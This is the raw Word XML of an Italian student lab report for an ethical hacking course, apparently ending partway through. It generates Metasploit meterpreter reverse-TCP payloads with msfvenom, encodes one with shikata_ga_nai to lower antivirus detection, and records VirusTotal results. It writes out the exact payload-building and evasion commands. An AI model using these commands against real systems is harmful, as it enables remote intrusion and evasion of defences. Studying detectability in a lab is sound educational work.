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54602B" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Report sull'Esercizio: Creazione e Analisi di Payload Offuscati per la Valutazione della Rilevabilità</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DABE225" w14:textId="34F7FF62" w:rsidR="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autore:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Stefano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C4762D" w14:textId="77777777" w:rsidR="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Corso:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Ethical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Hacking &amp; Cybersecurity </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA137B" w14:textId="660F5F36" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> 26 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Maggio</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CA48EC" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:pict w14:anchorId="562AE0DB">
          <v:rect id="_x0000_i1088" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="585C6D82" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Introduzione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C10DF5" w14:textId="52D006FE" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">L'obiettivo di questo esercizio è esplorare le tecniche di offuscamento utilizzate per ridurre la rilevabilità di payload malevoli, specificamente quelli generati con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">. Comprendere come gli attaccanti tentano di eludere i sistemi di sicurezza è fondamentale per sviluppare strategie di difesa più robuste e proattive. L'attività si è concentrata sulla generazione di diversi payload, applicando tecniche di codifica e offuscamento, e analizzandone la rilevabilità tramite piattaforme di scansione antivirus come </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A413743" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Preparazione dell'Ambiente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528D6A95" w14:textId="010AF5D6" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">L'esercizio è stato condotto all'interno di un ambiente di laboratorio virtualizzato e isolato, utilizzando una macchina virtuale </w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> come sistema attaccante e generatore di payload. Questa configurazione garantisce che nessuna attività potenzialmente dannosa possa fuoriuscire nell'ambiente </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> o in reti esterne, aderendo ai principi di sicurezza e responsabilità dell'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>ethical</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> hacking. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">, parte del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Framework, è stato lo strumento primario utilizzato per la generazione dei payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163EBA89" w14:textId="290D1F8E" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. Generazione e Analisi del Payload Base </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F86DC87" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:t>Il primo passo dell'esercizio ha previsto la generazione di un payload standard per stabilire un punto di riferimento in termini di rilevabilità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C7212C" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilizzato:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EB1F02" w14:textId="7A57B62C" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.1.10 LPORT=4444 -f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -o payload_base.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E118B0F" w14:textId="506F0073" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">: Specifica il payload. In questo caso, una sessione </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> per Windows che si connetterà in reverse TCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1210978B" w14:textId="26FD4993" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LHOST=192.168.1.10</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t>: Indica l'indirizzo IP dell'attaccante (Kali Linux) a cui il payload tenterà di connettersi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219261DA" w14:textId="66A062FF" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LPORT=4444</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t>: Specifica la porta su cui l'attaccante sarà in ascolto per la connessione in arrivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C09E13" w14:textId="5D0527C3" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>: Indica il formato di output come file eseguibile Windows (.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037CE306" w14:textId="6FB91788" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="564864EA" wp14:editId="74D5B78F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>336550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6115050" cy="1000125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21394"/>
                <wp:lineTo x="21533" y="21394"/>
                <wp:lineTo x="21533" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1795805279"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15050" cy="1000125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-o payload_base.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t>: Specifica il nome del file di output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691DFF6B" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risultato della Generazione:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Il comando ha generato un file payload_base.exe di circa 73.802 bytes. È stato esplicitamente notato da </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> che "No encoder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>specified</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>outputting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> payload", confermando l'assenza di offuscamento integrato.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDCAC73" w14:textId="5B7FF0C9" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="203EC7A0" wp14:editId="0F1361C0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>300355</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3343275" cy="2400300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21429"/>
                <wp:lineTo x="21538" y="21429"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1207121758"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43275" cy="24003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5679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Analisi su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> base.png):</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Il caricamento di payload_base.exe su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> ha rivelato un'elevata rilevabilità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D085EE" w14:textId="77777777" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rilevamenti:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Il file è stato flaggato come malevolo da </w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>60/72</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> motori antivirus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AEC040" w14:textId="0DB2E70F" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Etichette Comuni:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> trojan, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>hacktool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>cryptz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>. Molti motori hanno identificato esplicitamente il payload come Win32/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve">-C o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Trojan.Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BCA40E" w14:textId="44B068C4" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusioni sul Payload Base:</w:t>
      </w:r>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> Come atteso, un payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t xml:space="preserve"> non offuscato è immediatamente riconosciuto dalla maggior parte dei motori antivirus. Questo serve da base per valutare l'efficacia delle successive tecniche di offuscamento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE8520" w14:textId="5FB7270F" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Generazione del Payload con Encoder (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shikata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ga Nai)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7606E0" w14:textId="4CDE0669" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:t>Il secondo passo ha introdotto l'uso di un encoder per alterare la firma del payload e ridurne la rilevabilità.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416E815D" w14:textId="67D1546B" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Utilizzato:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4765A054" w14:textId="5F5E602D" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.1.10 LPORT=4444 -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -i 3 -o payload_encoded.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C4A4AA" w14:textId="782F731E" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>: Specifica l'uso dell'encoder polimorfico x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0035679F">
        <w:t>. Questo encoder è noto per la sua capacità di generare payload unici ad ogni esecuzione.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EDC1AF" w14:textId="0AEFED5F" w:rsidR="0035679F" w:rsidRPr="0035679F" w:rsidRDefault="0035679F" w:rsidP="0035679F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
